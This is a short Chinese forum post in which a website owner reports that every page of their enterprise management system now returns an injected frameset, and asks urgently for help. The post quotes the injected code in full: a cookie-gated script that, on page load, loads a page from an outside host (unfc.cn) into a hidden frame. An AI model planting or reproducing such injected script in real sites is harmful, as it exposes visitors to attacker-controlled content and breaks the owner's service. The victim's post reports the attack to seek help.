突然间,我的网站的所有请求网页输出的均是:<html>
<head>
</head>
<script>
function showme()
{
var CK=document.cookie;
var sa=CK.indexOf("CK");
if(sa!=-1){}else{var EP=new Date();
EP.setTime(EP.getTime()+24*60*60*1000);
document.cookie="CK=test;expires="+EP.toGMTString();
self.hi.location="http://www.unfc.cn/template/css.html";}
}
</script>
<frameset rows="100%,*" onLoad="showme()">
<frame name="hello" src="/z_index.php?uID=1">
<frame name="hi" src="">
</frameset>
</html>其中, /z_index.php  是我的网址,显然被篡改了什么配置,正常情况下使用者不容易发觉,但被挂码了,要紧的是我的很多javax请求根本就不能用,我是企业的管理系统,现在已经不能工作了。
望有高手指点,急!在线等。